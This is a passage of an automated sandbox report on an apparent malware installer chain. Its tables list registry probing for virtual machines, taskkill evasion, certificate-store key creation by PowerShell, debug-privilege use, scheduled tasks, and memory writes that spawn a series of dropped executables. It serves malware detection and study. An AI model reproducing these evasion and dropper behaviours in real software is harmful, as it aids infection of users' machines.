N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\SysWOW64\fontview.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\SysWOW64\fontview.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\fontview.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\fontview.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\fontview.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\Documents\best_hack.zip_id23904541.exe N/A
N/A N/A C:\Users\Admin\Documents\best_hack.zip_id23904541.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\fontview.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\fontview.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\best_hack.zip_id23904541.exe N/A
N/A N/A C:\Users\Admin\Documents\best_hack.zip_id23904541.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4864 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp
PID 4864 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp
PID 4864 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp
PID 1656 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1656 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1656 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1656 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1656 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1656 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1656 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1656 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1656 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1800 wrote to memory of 4056 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\Documents\best_hack.zip_id23904541.exe
PID 1800 wrote to memory of 4056 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\Documents\best_hack.zip_id23904541.exe
PID 1800 wrote to memory of 4056 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\Documents\best_hack.zip_id23904541.exe
PID 1800 wrote to memory of 1588 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe
PID 1800 wrote to memory of 1588 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe
PID 1800 wrote to memory of 2340 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
PID 1800 wrote to memory of 2340 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
PID 1800 wrote to memory of 2340 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
PID 2340 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp
PID 2340 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp
PID 2340 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp
PID 1800 wrote to memory of 1200 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe
PID 1800 wrote to memory of 1200 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe
PID 1800 wrote to memory of 1200 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe
PID 4100 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe
PID 4100 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe
PID 4100 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe
PID 1588 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
